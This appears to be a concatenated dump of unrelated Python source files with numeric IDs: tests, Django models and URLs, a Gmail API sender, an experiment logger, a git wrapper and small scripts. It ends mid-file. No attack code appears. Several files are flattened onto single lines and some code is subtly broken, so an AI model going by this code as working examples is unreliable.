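# Hedged usage sketch (an addition): 'input.mp4' and the './scenes/' directory
# are illustrative paths, not part of the original module.
if __name__ == "__main__":
    clusters = get_frames_clusters_from_video("input.mp4")
    all_frames = [frame for cluster in clusters for frame in cluster]
    for idx, group in enumerate(group_semantic_frames(all_frames)):
        export_video_frames(group, "./scenes/scene_%d/" % idx)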
11589041
def prime(num):
    # Returns True if num is prime, False otherwise
    if num > 1:
        for i in range(2, int(num / 2) + 1):
            if (num % i) == 0:
                return False
        return True
    return False


n = int(input("Enter Number:"))
p = n
x = prime(n)

# Reverse the digits of n
rev = 0
while n > 0:
    a = n % 10
    rev = rev * 10 + a
    n = n // 10
y = prime(rev)

# An emirp is a prime whose reversal is a *different* prime, so
# palindromic primes such as 11 are excluded (13 is an emirp: 31 is prime).
if x and y and p != rev:
    print(p, " is Emirp Number")
else:
    print(p, " is not Emirp Number")
11589055
import numpy as np import unittest import spikeextractors as se class TestNumpyExtractors(unittest.TestCase): def setUp(self): M = 4 N = 10000 N_ttl = 50 seed = 0 sampling_frequency = 30000 X = np.random.RandomState(seed=seed).normal(0, 1, (M, N)) geom = np.random.RandomState(seed=seed).normal(0, 1, (M, 2)) self._X = X self._geom = geom self._sampling_frequency = sampling_frequency self.RX = se.NumpyRecordingExtractor(timeseries=X, sampling_frequency=sampling_frequency, geom=geom) self._ttl_frames = np.sort(np.random.permutation(N)[:N_ttl]) self.RX.set_ttls(self._ttl_frames) self.SX = se.NumpySortingExtractor() L = 200 self._train1 = np.rint(np.random.RandomState(seed=seed).uniform(0, N, L)).astype(int) self.SX.add_unit(unit_id=1, times=self._train1) self.SX.add_unit(unit_id=2, times=np.random.RandomState(seed=seed).uniform(0, N, L)) self.SX.add_unit(unit_id=3, times=np.random.RandomState(seed=seed).uniform(0, N, L)) def tearDown(self): pass def test_recording_extractor(self): # get_channel_ids self.assertEqual(self.RX.get_channel_ids(), [i for i in range(self._X.shape[0])]) # get_num_channels self.assertEqual(self.RX.get_num_channels(), self._X.shape[0]) # get_num_frames self.assertEqual(self.RX.get_num_frames(), self._X.shape[1]) # get_sampling_frequency self.assertEqual(self.RX.get_sampling_frequency(), self._sampling_frequency) # get_traces self.assertTrue(np.allclose(self.RX.get_traces(), self._X)) self.assertTrue( np.allclose(self.RX.get_traces(channel_ids=[0, 3], start_frame=0, end_frame=12), self._X[[0, 3], 0:12])) # get_channel_property - location self.assertTrue(np.allclose(np.array(self.RX.get_channel_locations(1)), self._geom[1, :])) # time_to_frame / frame_to_time self.assertEqual(self.RX.time_to_frame(12), 12 * self.RX.get_sampling_frequency()) self.assertEqual(self.RX.frame_to_time(12), 12 / self.RX.get_sampling_frequency()) # get_snippets snippets = self.RX.get_snippets(reference_frames=[0, 30, 50], snippet_len=20) self.assertTrue(np.allclose(snippets[1], self._X[:, 20:40])) # get_ttl_events self.assertTrue(np.array_equal(self.RX.get_ttl_events()[0], self._ttl_frames)) def test_sorting_extractor(self): unit_ids = [1, 2, 3] # get_unit_ids self.assertEqual(self.SX.get_unit_ids(), unit_ids) # get_unit_spike_train st = self.SX.get_unit_spike_train(unit_id=1) self.assertTrue(np.allclose(st, self._train1)) if __name__ == '__main__': unittest.main()
11589063
from tests.unit import base from src import config as config_module config = config_module.get_config() class CreateApiTest(base.TestCase): @base.mock.patch('src.api.create_api') @base.mock.patch('src.initialize.web_app') def test_should_call_api_to_create_api(self, web_app_mock, create_api_mock): base.initialize.create_api() create_api_mock.assert_called_with(web_app_mock) class RunTest(base.TestCase): @base.mock.patch('src.initialize.web_app') @base.mock.patch('src.initialize.create_api') def test_should_call_web_app_to_run(self, create_api_mock, web_app_mock): base.initialize.run() web_app_mock.run.assert_called_with(host='0.0.0.0', port=int(config.PORT), debug=True, threaded=True)
11589088
from kornia.geometry.bbox import * from kornia.geometry.calibration import * from kornia.geometry.camera import * from kornia.geometry.conversions import * from kornia.geometry.depth import * from kornia.geometry.epipolar import * from kornia.geometry.homography import * from kornia.geometry.linalg import * from kornia.geometry.ransac import * from kornia.geometry.subpix import * from kornia.geometry.transform import *
11589090
r""" Advanced example ================== Let's present how one can specify different aspects of the problem formulation and model selection strategy on classo, using synthetic data. """ # %% # Import the package # ^^^^^^^^^^^^^^^^^^^^ import sys, os from os.path import join, dirname, abspath classo_dir = dirname(dirname(abspath("__file__"))) sys.path.append(classo_dir) from classo import classo_problem, random_data import numpy as np # %% # Generate the data # ^^^^^^^^^^^^^^^^^^^^^^^^^^^ # # This code snippet generates a problem instance with sparse ß in dimension # d=100 (sparsity d_nonzero=5). The design matrix X comprises n=100 samples generated from an i.i.d standard normal # distribution. The dimension of the constraint matrix C is d x k matrix. The noise level is σ=0.5. # The input `zerosum=True` implies that C is the all-ones vector and Cß=0. The n-dimensional outcome vector y # and the regression vector ß is then generated to satisfy the given constraints. # One can then see the parameters that should be selected. m, d, d_nonzero, k, sigma = 100, 200, 5, 1, 0.5 (X, C, y), sol = random_data( m, d, d_nonzero, k, sigma, zerosum=True, seed=1, intercept=1.0 ) # %% # Create labels # ^^^^^^^^^^^^^^^^^^^^^^^^^^^ # # This code snoppet creates labels that indicate where the solution ß should be nonzero. labels = np.empty(d, dtype=str) for i in range(d): if sol[i] == 0.0: labels[i] = "no_" + str(i) else: labels[i] = "yes_" + str(i) # %% # Define the classo instance # ^^^^^^^^^^^^^^^^^^^^^^^^^^^ # # Next we can define a default c-lasso problem instance with the generated data: problem = classo_problem(X, y, C) # %% # Change the parameters # ^^^^^^^^^^^^^^^^^^^^^^^^^^^ # # Let's see some example of change in the parameters problem.formulation.huber = True problem.formulation.concomitant = False problem.formulation.intercept = True problem.model_selection.CV = True problem.model_selection.LAMfixed = True problem.model_selection.StabSelparameters.method = "max" problem.model_selection.CVparameters.seed = 1 problem.model_selection.LAMfixedparameters.rescaled_lam = True problem.model_selection.LAMfixedparameters.lam = 0.1 # %% # Check parameters # ^^^^^^^^^^^^^^^^^^^^^^^^^^^ # # You can look at the generated problem instance by typing: print(problem) # %% # Solve optimization problems # ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ # # We use stability selection as default model selection strategy. # The command also allows you to inspect the computed stability profile for all variables # at the theoretical λ. # Two other model selections are computed here: # computation of the solution for a fixed lambda; # a path computation followed by a computation of the Approximation of the Leave-one Out error (ALO); # a k-fold cross-validation. problem.solve() # %% # Visualisation # ^^^^^^^^^^^^^^^ # # After completion, the results of the optimization and model selection routines # can be visualized using print(problem.solution) # %% # R1 formulation with ALO # ^^^^^^^^^^^^^^^^^^^^^^^^^^ # problem.data.label = labels problem.formulation.intercept = False problem.formulation.huber = False problem.model_selection.ALO = True problem.model_selection.CV = False problem.model_selection.LAMfixed = False problem.solve() print(problem) print(problem.solution)
11589095
import pytest

PRIVATE_KEY = "private_key"
PRIVATE_VALUE = "private_value"

PUBLIC_KEY = "key"
PUBLIC_VALUE = "value"


@pytest.fixture
def payment_with_public_metadata(payment):
    payment.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    payment.save(update_fields=["metadata"])
    return payment


@pytest.fixture
def payment_with_private_metadata(payment):
    payment.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    payment.save(update_fields=["private_metadata"])
    return payment
11589117
from django.conf.urls.defaults import patterns, url

# base urls
urlpatterns = patterns(
    'popcorn_gallery.popcorn.views.projects',
    url(r'^projects/$', 'project_list', name='project_list'),
    url(r'^projects/category/(?P<slug>[\w-]+)/$', 'project_list',
        name='project_list_category'),
    url(r'^projects/category/(?P<slug>[\w-]+)/join/$', 'project_category_join',
        name='project_category_join'),
    )

template_pattern = '(?P<username>[-\w]+)/(?P<slug>[-\w]+)'

# templates urls
urlpatterns += patterns(
    'popcorn_gallery.popcorn.views.projects',
    url(r'^templates/$', 'template_list', name='template_list'),
    url(r'^templates/category/(?P<slug>[\w-]+)/$', 'template_list',
        name='template_list_category'),
    url(r'^template/(?P<slug>[\w-]+)/$', 'template_detail',
        name='template_detail'),
    url(r'^template/(?P<slug>[\w-]+)/config$', 'template_config',
        name='template_config'),
    url(r'^template/(?P<slug>[\w-]+)/data$', 'template_metadata',
        name='template_metadata'),
    url(r'^template/(?P<slug>[\w-]+)/summary/$', 'template_summary',
        name='template_summary'),
    )

project_pattern = '(?P<username>[-\w]+)/(?P<shortcode>[-\w]+)'

# user_project urls
urlpatterns += patterns(
    'popcorn_gallery.popcorn.views.projects',
    url(r'^%s/$' % project_pattern, 'user_project', name='user_project'),
    url(r'^%s/edit/$' % project_pattern, 'user_project_butter',
        name='user_project_butter'),
    url(r'^%s/config$' % project_pattern, 'user_project_config',
        name='user_project_config'),
    url(r'^%s/edit/config$' % project_pattern, 'user_project_config'),
    url(r'^%s/options/$' % project_pattern, 'user_project_edit',
        name='user_project_edit'),
    url(r'^%s/meta/$' % project_pattern, 'user_project_meta',
        name='user_project_meta'),
    url(r'^%s/data$' % project_pattern, 'user_project_data',
        name='user_project_data'),
    url(r'^%s/edit/data$' % project_pattern, 'user_project_data'),
    url(r'^%s/delete/$' % project_pattern, 'user_project_delete',
        name='user_project_delete'),
    url(r'^%s/fork/$' % project_pattern, 'user_project_fork',
        name='user_project_fork'),
    url(r'^%s/summary/$' % project_pattern, 'user_project_summary',
        name='user_project_summary'),
    )
11589122
import torch
import torch.nn as nn
import torch.nn.functional as F
from lib.layers import (
    ResnetBlockFC, CResnetBlockConv1d,
    CBatchNorm1d, CBatchNorm1d_legacy,
)


class DecoderCBatchNorm(nn.Module):
    ''' Decoder class with CBN for ONet 4D.

    Args:
        dim (int): points dimension
        c_dim (int): dimension of latent conditioned temporal code c
        hidden_size (int): hidden dimension
        leaky (bool): whether to use leaky activation
        legacy (bool): whether to use legacy version
    '''

    def __init__(self, dim=3, c_dim=128,
                 hidden_size=256, leaky=False, legacy=False):
        super().__init__()
        self.dim = dim

        self.fc_p = nn.Conv1d(dim, hidden_size, 1)

        self.block0 = CResnetBlockConv1d(c_dim, hidden_size, legacy=legacy)
        self.block1 = CResnetBlockConv1d(c_dim, hidden_size, legacy=legacy)
        self.block2 = CResnetBlockConv1d(c_dim, hidden_size, legacy=legacy)
        self.block3 = CResnetBlockConv1d(c_dim, hidden_size, legacy=legacy)
        self.block4 = CResnetBlockConv1d(c_dim, hidden_size, legacy=legacy)

        if not legacy:
            self.bn = CBatchNorm1d(c_dim, hidden_size)
        else:
            self.bn = CBatchNorm1d_legacy(c_dim, hidden_size)

        self.fc_out = nn.Conv1d(hidden_size, 1, 1)

        if not leaky:
            self.actvn = F.relu
        else:
            self.actvn = lambda x: F.leaky_relu(x, 0.2)

    # For ONet 4D
    def add_time_axis(self, p, t):
        ''' Adds time axis to points.

        Args:
            p (tensor): points
            t (tensor): time values
        '''
        n_pts = p.shape[1]
        t = t.unsqueeze(1).repeat(1, n_pts, 1)
        p_out = torch.cat([p, t], dim=-1)
        return p_out

    def forward(self, p, c, **kwargs):
        ''' Performs a forward pass through the model.

        Args:
            p (tensor): points tensor
            c (tensor): latent conditioned temporal code c
        '''
        # if p.shape[-1] != self.dim:
        #     p = self.add_time_axis(p, kwargs['t'])
        p = p.transpose(1, 2)
        batch_size, D, T = p.size()
        net = self.fc_p(p)

        net = self.block0(net, c)
        net = self.block1(net, c)
        net = self.block2(net, c)
        net = self.block3(net, c)
        net = self.block4(net, c)

        out = self.fc_out(self.actvn(self.bn(net, c)))
        out = out.squeeze(1)

        return out
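
# --- Usage sketch (added for illustration; shapes are assumptions and
# lib.layers must be importable) ---
# Query 1024 4D points (xyz + t) for a batch of 8 conditioning codes.
if __name__ == '__main__':
    decoder = DecoderCBatchNorm(dim=4, c_dim=128, hidden_size=256)
    p = torch.rand(8, 1024, 4)   # (batch, n_points, dim)
    c = torch.rand(8, 128)       # (batch, c_dim)
    out = decoder(p, c)          # (batch, n_points) occupancy logits
    print(out.shape)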
11589184
import datetime from distutils import dir_util import os import pandas as pd import shutil import warnings def copytree(src, dst, symlinks=False, ignore=None): ''' Function to copy directories. ''' if not os.path.exists(dst): os.makedirs(dst) for item in os.listdir(src): s = os.path.join(src, item) d = os.path.join(dst, item) if os.path.isdir(s): shutil.copytree(s, d, symlinks, ignore) else: shutil.copy2(s, d) def save(files, experiment_name='', params={}, scores={}, other={}, comments='', update_html_flag=False, working_dir='', kinoa_dir_name='__kinoa__', use_spaces=False, sort_log_by='experiment_datetime', sort_log_ascending=True, columns_order=[]): ''' Function to save experiment. Inputs: - files (list of str) - List of files and directories to save. - experiment_name (str) - String with name of an experiment. If empty - date and time used to define the name in a format %Y-%m-%d_%H-%M-%S. - params (dict) - Dictionary with parameters of experiment. - scores (dict) - Dictionary with evaluation results. - other (dict) - Dictionary with other data needed in log. - comments (str) - String with comments to the experiment. - working_dir (str) - Path to the directory, where log of experiments will be stored. kinoa_dir_name directory will be created within working_dir. - kinoa_dir_name (str) - Name of the directory, where logs will be stored. - use_spaces (bool) - Flag if spaces should be used in a directory name for current experiment. - sort_log_by (str or list of str) - Specify which columns to use to sort rows in the log file. - sort_log_ascending (bool or list of bool) - Sort ascending vs. descending. Specify list for multiple sort orders. If this is a list of bools, must match the length of the sort_log_by. - columns_order (list of str or dict in format ('col_name': index)) - Specify order of columns in the log file. Columns that are not present in columns_order will remain in the file, but after specified columns. 
    '''
    # Get date time of experiment log
    now = datetime.datetime.now()
    experiment_datetime = str(now.strftime('%Y-%m-%d_%H-%M-%S'))
    if len(experiment_name) == 0:
        experiment_name = experiment_datetime

    # Define delimiter for new directories
    if use_spaces:
        delimiter = ' '
    else:
        delimiter = '_'
    experiment_name = experiment_name.replace(' ', delimiter)

    # Define directory name for current experiment
    if len(working_dir) == 0:
        if experiment_name == experiment_datetime:
            working_dir = os.path.join(kinoa_dir_name, experiment_datetime)
        else:
            working_dir = os.path.join(kinoa_dir_name,
                                       experiment_datetime + delimiter + experiment_name)
    else:
        if experiment_name == experiment_datetime:
            working_dir = os.path.join(working_dir, kinoa_dir_name, experiment_datetime)
        else:
            working_dir = os.path.join(working_dir, kinoa_dir_name,
                                       experiment_datetime + delimiter + experiment_name)

    if not os.path.exists(working_dir):
        os.makedirs(working_dir)

    # Copy files and directories
    if isinstance(files, list):
        for file in files:
            if os.path.isdir(file):
                copytree(file, os.path.join(working_dir, file))
            else:
                file_dir = os.path.dirname(file)
                if len(file_dir) > 0:
                    if not os.path.exists(os.path.join(working_dir, file_dir)):
                        os.makedirs(os.path.join(working_dir, file_dir))
                shutil.copy2(file, os.path.join(working_dir, file))

    # Prepare experiment description
    experiment_dict = {
        'experiment_name': experiment_name,
        'experiment_datetime': experiment_datetime,
        'comments': comments
    }
    header_cols = ['experiment_datetime', 'experiment_name', 'comments']

    # Update dictionaries
    params_cols = []
    for k in params.keys():
        col_name = 'params.' + str(k)
        experiment_dict[col_name] = params[k]
        params_cols.append(col_name)

    scores_cols = []
    for k in scores.keys():
        col_name = 'scores.' + str(k)
        experiment_dict['scores.' + str(k)] = scores[k]
        scores_cols.append(col_name)

    other_cols = []
    for k in other.keys():
        col_name = 'other.' + str(k)
        experiment_dict['other.' + str(k)] = other[k]
        other_cols.append(col_name)

    # Append experiment to experiments log
    log_fname = os.path.join(kinoa_dir_name, 'log.csv')
    if os.path.isfile(log_fname):
        log_df = pd.read_csv(log_fname)
        existing_cols = log_df.columns
    else:
        log_df = pd.DataFrame()
        existing_cols = []

    # Update columns order in csv file
    params_cols = sorted(list(set(params_cols + [c for c in existing_cols if 'params.' in c])))
    scores_cols = sorted(list(set(scores_cols + [c for c in existing_cols if 'scores.' in c])))
    other_cols = sorted(list(set(other_cols + [c for c in existing_cols if 'other.' in c])))

    cols_order = header_cols + params_cols + other_cols

    # Check for unknown columns
    unknown_cols = []
    for c in existing_cols:
        if c not in cols_order and c not in scores_cols:
            unknown_cols.append(c)
    cols_order += unknown_cols + scores_cols

    # Append new experiment to log
    log_df = log_df.append(pd.Series(experiment_dict), ignore_index=True)

    # Sort rows in log table
    if sort_log_by not in log_df.columns:
        warnings.warn(str(sort_log_by) + ' column was not found. Using experiment_datetime ' +
                      'instead.')
        sort_log_by = 'experiment_datetime'

    # Reorder columns using user-defined list
    if len(columns_order) > 0:
        if isinstance(columns_order, list):
            # Iterate over a copy so that items can be removed safely
            for c in list(columns_order):
                if c in cols_order:
                    cols_order.remove(c)
                else:
                    warnings.warn(str(c) + ' column was not found in log. Skipped.')
                    columns_order.remove(c)
            cols_order = columns_order + cols_order
        elif isinstance(columns_order, dict):
            n_cols = len(cols_order)
            keys = list(columns_order.keys())
            for c in keys:
                if c in cols_order:
                    cols_order.remove(c)
                else:
                    warnings.warn(str(c) + ' column was not found in log. Skipped.')
                    columns_order.pop(c)
            for key, value in sorted(columns_order.items(), key=lambda x: x[1]):
                idx = value
                if idx < 0:
                    idx = n_cols + idx + 1
                cols_order.insert(idx, key)
        else:
            warnings.warn('Wrong type of columns_order variable. List or dict is expected. ' +
                          'Got ' + str(type(columns_order)) + '.')

    # Save results to CSV file
    log_df[cols_order].sort_values(sort_log_by, ascending=sort_log_ascending).\
        to_csv(log_fname, index=False)

    if update_html_flag:
        update_html()


def update_html():
    '''
    Function to generate update report in html.
    '''
    pass
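
# --- Usage sketch (added for illustration; file names are hypothetical) ---
# Log an experiment: copies the listed files into a timestamped directory
# under __kinoa__/ and appends a row to __kinoa__/log.csv.
if __name__ == '__main__':
    save(
        files=['train.py', 'config/'],
        experiment_name='baseline',
        params={'lr': 0.01, 'epochs': 10},
        scores={'accuracy': 0.93},
        comments='first run',
    )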
11589211
from bitmovin_api_sdk.encoding.configurations.video.mjpeg.customdata.customdata_api import CustomdataApi
11589272
from __future__ import print_function import base64 import mimetypes import os from email.mime.audio import MIMEAudio from email.mime.base import MIMEBase from email.mime.image import MIMEImage from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText import httplib2 import oauth2client from apiclient import errors, discovery from oauth2client import client, tools SCOPES = 'https://www.googleapis.com/auth/gmail.send' CLIENT_SECRET_FILE = 'client_secret.json' APPLICATION_NAME = 'Gmail API Python Send Email' def get_credentials(): home_dir = os.path.expanduser('~') credential_dir = os.path.join(home_dir, '.credentials') if not os.path.exists(credential_dir): os.makedirs(credential_dir) credential_path = os.path.join(credential_dir, 'gmail-python-email-send.json') store = oauth2client.file.Storage(credential_path) credentials = store.get() if not credentials or credentials.invalid: flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES) flow.user_agent = APPLICATION_NAME credentials = tools.run_flow(flow, store) print('Storing credentials to ' + credential_path) return credentials def SendMessage(sender, to, subject, msgHtml, msgPlain, attachmentFile=None): credentials = get_credentials() http = credentials.authorize(httplib2.Http()) service = discovery.build('gmail', 'v1', http=http) if attachmentFile: message1 = createMessageWithAttachment(sender, to, subject, msgHtml, msgPlain, attachmentFile) else: message1 = CreateMessageHtml(sender, to, subject, msgHtml, msgPlain) result = SendMessageInternal(service, "me", message1) return result def SendMessageInternal(service, user_id, message): try: message = (service.users().messages().send(userId=user_id, body=message).execute()) print('Message Id: %s' % message['id']) return message except errors.HttpError as error: print('An error occurred: %s' % error) return "Error" return "OK" def createMessageWithAttachment( sender, to, subject, msgHtml, msgPlain, attachmentFile): """Create a message for an email. Args: sender: Email address of the sender. to: Email address of the receiver. subject: The subject of the email message. msgHtml: Html message to be sent msgPlain: Alternative plain text message for older email clients attachmentFile: The path to the file to be attached. Returns: An object containing a base64url encoded email object. 
""" message = MIMEMultipart('mixed') message['to'] = to message['from'] = sender message['subject'] = subject messageA = MIMEMultipart('alternative') messageR = MIMEMultipart('related') messageR.attach(MIMEText(msgHtml, 'html')) messageA.attach(MIMEText(msgPlain, 'plain')) messageA.attach(messageR) message.attach(messageA) print("create_message_with_attachment: file:", attachmentFile) content_type, encoding = mimetypes.guess_type(attachmentFile) if content_type is None or encoding is not None: content_type = 'application/octet-stream' main_type, sub_type = content_type.split('/', 1) if main_type == 'text': fp = open(attachmentFile, 'rb') msg = MIMEText(fp.read(), _subtype=sub_type) fp.close() elif main_type == 'image': fp = open(attachmentFile, 'rb') msg = MIMEImage(fp.read(), _subtype=sub_type) fp.close() elif main_type == 'audio': fp = open(attachmentFile, 'rb') msg = MIMEAudio(fp.read(), _subtype=sub_type) fp.close() else: fp = open(attachmentFile, 'rb') msg = MIMEBase(main_type, sub_type) msg.set_payload(fp.read()) fp.close() filename = os.path.basename(attachmentFile) msg.add_header('Content-Disposition', 'attachment', filename=filename) message.attach(msg) return {'raw': base64.urlsafe_b64encode(message.as_string())} def CreateMessageHtml(sender, to, subject, msgHtml, msgPlain): msg = MIMEMultipart('alternative') msg['Subject'] = subject msg['From'] = sender msg['To'] = to msg.attach(MIMEText(msgPlain, 'plain')) msg.attach(MIMEText(msgHtml, 'html')) return {'raw': base64.urlsafe_b64encode(msg.as_string())} def main(): to = input("Enter Email Address: ") sender = input("Your Mail ID: ") subject = input("Enter your Subject: ") msgHtml = input("Enter your Message: ") msgPlain = "Hi\nPlain Email" SendMessage(sender, to, subject, msgHtml, msgPlain) # Send message with attachment: # SendMessage(sender, to, subject, msgHtml, msgPlain, '/path/to/file.pdf') if __name__ == '__main__': main()
11589273
from os import cpu_count
from multiprocessing.dummy import Pool


def test(i):
    print(f"Thread {i} entering an infinite loop~")
    while True:
        pass


def main():
    pool = Pool(5)
    pool.map_async(test, range(5))
    pool.close()
    pool.join()


if __name__ == '__main__':
    main()
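
# --- Note (added for illustration) ---
# multiprocessing.dummy.Pool is a *thread* pool, so the five busy-loop
# workers above all share one GIL and effectively one CPU core. A
# process-based pool that actually uses multiple cores would only need
# the import swapped:
#
#   from multiprocessing import Pool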
11589277
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals

import os
import tempfile

import pytest
from django.core.management import call_command
from mock import patch

from kolibri.core.deviceadmin.tests.test_dbrestore import is_sqlite_settings
from kolibri.core.deviceadmin.tests.test_dbrestore import mock_status_not_running
from kolibri.core.deviceadmin.utils import dbbackup
from kolibri.core.deviceadmin.utils import IncompatibleDatabase


def test_active_kolibri():
    """
    Tests that we cannot back up while kolibri is active
    """
    with patch(
        "kolibri.utils.server.get_status",
        return_value=(12345, "http://127.0.0.1", 1234),
    ) as gs:
        with pytest.raises(SystemExit):
            call_command("dbbackup")
        gs.assert_called_once()


def test_inactive_kolibri():
    """
    Tests that if kolibri is inactive, a dump is created
    """
    if not is_sqlite_settings():
        return
    dest_folder = tempfile.mkdtemp()
    with patch(
        "kolibri.utils.server.get_status", side_effect=mock_status_not_running
    ) as gs:
        # The destination folder starts out empty; after running the
        # command, exactly one dump file should have been created
        assert not os.listdir(dest_folder)
        call_command("dbbackup", dest_folder=dest_folder)
        gs.assert_called_once()
        files = os.listdir(dest_folder)
        assert len(files) == 1
        assert os.path.getsize(os.path.join(dest_folder, files[0])) > 1000


def test_not_sqlite():
    if is_sqlite_settings():
        return
    with pytest.raises(IncompatibleDatabase):
        dbbackup("/doesnt/matter.file")
11589298
import os from subprocess import Popen class GitError(Exception): pass def clone(repo_url, wd): # pylint: disable=consider-using-with DEVNULL = open(os.devnull, 'w') proc = Popen(['git', 'clone', repo_url, wd], stdout=DEVNULL, stderr=DEVNULL) proc.communicate() if proc.returncode != 0: raise GitError('git clone failed: {}'.format(repo_url)) def checkout(commit, wd): # pylint: disable=consider-using-with DEVNULL = open(os.devnull, 'w') proc = Popen(['git', 'checkout', commit], cwd=wd, stdout=DEVNULL, stderr=DEVNULL) proc.communicate() if proc.returncode != 0: raise GitError('git checkout failed: {}'.format(commit))
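
# --- Usage sketch (added for illustration; the URL and ref below are
# hypothetical placeholders) ---
# Clone a repository into a temporary directory and check out a ref.
if __name__ == '__main__':
    import tempfile

    wd = tempfile.mkdtemp()
    clone('https://example.com/some/repo.git', wd)
    checkout('main', wd)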
11589318
from .Sample import *
from .Source import *
from .ArtIllumina import *
from .MasonIllumina import *
from .CuReSim import *
from .DwgSim import *
from .WgSim import *

import os

# rnftools.utils is used for error reporting below but was missing from
# the original imports
import rnftools.utils

__INCLUDE__ = os.path.join(os.path.dirname(__file__), "mishmash.snake")


def include():
    return __INCLUDE__


__INPUT__ = []


def add_input(input):
    __INPUT__.append(input)


def input():
    return __INPUT__


__SAMPLES__ = []


def add_sample(sample):
    __SAMPLES__.append(sample)


def samples():
    return __SAMPLES__


def current_sample():
    return __SAMPLES__[-1]


__SOURCES__ = []


def add_source(source):
    if len(samples()) == 0:
        rnftools.utils.error(
            "No sample defined",
            program="RNFtools",
            subprogram="MIShmash",
            exception=ValueError,
        )
    __SOURCES__.append(source)


def sources():
    return __SOURCES__


def sample(name, reads_in_tuple):
    """
    Create a new sample.
    """
    if name in [sample_x.get_name() for sample_x in __SAMPLES__]:
        rnftools.utils.error(
            "Multiple samples have the same name. Each sample must have a unique name.",
            program="RNFtools",
            subprogram="MIShmash",
            exception=ValueError,
        )
    Sample(
        name=name,
        reads_in_tuple=reads_in_tuple,
    )
    add_input(current_sample().fq_fns())
11589403
from django.contrib.auth.models import User, Group
from django.db import models
from datetime import timedelta
from django.conf import settings
from django.db.models.signals import post_save
from django.dispatch import receiver
from rest_framework.authtoken.models import Token
from django.contrib import admin
from django.contrib.auth.models import AbstractUser
from geoposition.fields import GeopositionField
from django.utils import timezone
from django.core.exceptions import ValidationError

from django_mysql.models import JSONField

# Create your models here.


class VRM_Account(models.Model):
    """
    Separating the VRM account for simplicity
    """
    vrm_user_id = models.CharField(max_length=100, default="", primary_key=True)
    vrm_password = models.CharField(max_length=100, default="")
    number_of_sites = models.IntegerField(default=0)

    def __str__(self):
        return self.vrm_user_id

    class Meta:
        verbose_name = 'VRM Account'
        verbose_name_plural = 'VRM Accounts'
        permissions = (
            ('view_VRM_Accounts', 'View VRM Account'),
        )


class Sesh_Organisation(models.Model):
    name = models.CharField(max_length=40)
    send_slack = models.BooleanField(default=False)
    slack_token = models.CharField(max_length=100, blank=True, null=True)

    def __str__(self):
        return self.name

    def get_users(self):
        return Sesh_User.objects.filter(organisation=self)


class Sesh_User(AbstractUser):
    """
    In creating Sesh_User instances, always remember to use create_user
    instead of create: Sesh_User.objects.create_user
    """
    department = models.CharField(max_length=100)
    organisation = models.ForeignKey(Sesh_Organisation, null=True)
    is_org_admin = models.BooleanField(default=False)
    phone_number = models.CharField(max_length=12, blank=True, null=True)
    on_call = models.BooleanField(default=False)
    send_mail = models.BooleanField(default=False)
    send_sms = models.BooleanField(default=False)

    def __str__(self):
        return self.username

    class Meta:
        verbose_name = 'User'
        verbose_name_plural = 'Users'


class Slack_Channel(models.Model):
    organisation = models.ForeignKey(Sesh_Organisation, related_name='slack_channel')
    name = models.CharField(max_length=40)
    is_alert_channel = models.BooleanField(default=True)

    def __str__(self):
        return self.name


class Status_Card(models.Model):
    """
    Contains the rows to be displayed in the status card
    """
    row1 = models.CharField(max_length=30, null=True, blank=True)
    row2 = models.CharField(max_length=30, null=True, blank=True)
    row3 = models.CharField(max_length=30, null=True, blank=True)
    row4 = models.CharField(max_length=30, null=True, blank=True)

    def __str__(self):
        return "For site: " + self.sesh_site.site_name

    def get_choices(self):
        """
        Returns the choices for the status card
        """
        from seshdash.utils.model_tools import get_site_sensor_fields_choices
        return get_site_sensor_fields_choices(self.sesh_site)


class Site_Measurements(models.Model):
    """
    Contains measurements to be displayed in graphs dropdowns
    """
    ROW_CHOICES = (
        ('AC_Load_in', 'AC Load in'),
        ('AC_Load_out', 'AC Load out'),
        ('AC_Voltage_in', 'AC Voltage in'),
        ('AC_Voltage_out', 'AC Voltage out'),
        ('AC_input', 'AC input'),
        ('AC_output', 'AC output'),
        ('AC_output_absolute', 'AC output absolute'),
        ('battery_voltage', 'Battery Voltage'),
        ('genset_state', 'Genset state'),
        ('main_on', 'Main on'),
        ('pv_production', 'PV production'),
        ('relay_state', 'Relay state'),
        ('soc', 'State of Charge'),
        ('trans', 'Trans'),
        ('cloud_cover', 'Cloud Cover'),
        ("daily_battery_charge", "Daily Battery Charge"),
        ("daily_grid_outage_n", "Daily Grid Outage N"),
        ("daily_grid_outage_t", "Daily Grid Outage T"),
("daily_grid_usage", "Daily Grid Usage"), ("daily_no_of_alerts", "Daily Number of Alerts"), ("daily_power_cons_pv", "Daily Power Cons Pv"), ("daily_power_consumption_total", "Daily Power Consumption Total"), ("daily_pv_yield", "Daily Pv Yield"), ) row1 = models.CharField(max_length=30, choices=ROW_CHOICES, default='soc') row2 = models.CharField(max_length=30, choices=ROW_CHOICES, default='battery_voltage') row3 = models.CharField(max_length=30, choices=ROW_CHOICES, default='AC_output_absolute') row4 = models.CharField(max_length=30, choices=ROW_CHOICES, default='AC_Load_in') row5 = models.CharField(max_length=30, choices=ROW_CHOICES, default='AC_Load_out') row6 = models.CharField(max_length=30, choices=ROW_CHOICES, default='AC_Voltage_in') row7 = models.CharField(max_length=30, choices=ROW_CHOICES, default='AC_Voltage_out') row8 = models.CharField(max_length=30, choices=ROW_CHOICES, default='AC_input') row9 = models.CharField(max_length=30, choices=ROW_CHOICES, default='AC_output') row10 = models.CharField(max_length=30, choices=ROW_CHOICES, default='cloud_cover') row11 = models.CharField(max_length=30, choices=ROW_CHOICES, default='daily_pv_yield') row12 = models.CharField(max_length=30, choices=ROW_CHOICES, default='daily_battery_charge') row13 = models.CharField(max_length=30, choices=ROW_CHOICES, default='daily_power_consumption_total') row14 = models.CharField(max_length=30, choices=ROW_CHOICES, default='daily_power_cons_pv') row15 = models.CharField(max_length=30, choices=ROW_CHOICES, default='daily_grid_outage_n') def __str__(self): return self.sesh_site.site_name class Sesh_Site(models.Model): """ Model for each PV SESH installed site """ site_name = models.CharField(max_length=100, unique = True) organisation = models.ForeignKey(Sesh_Organisation, null=True, blank=True) comission_date = models.DateTimeField('date comissioned') location_city = models.CharField(max_length = 100) location_country = models.CharField(max_length = 100) time_zone = models.CharField(max_length = 100, 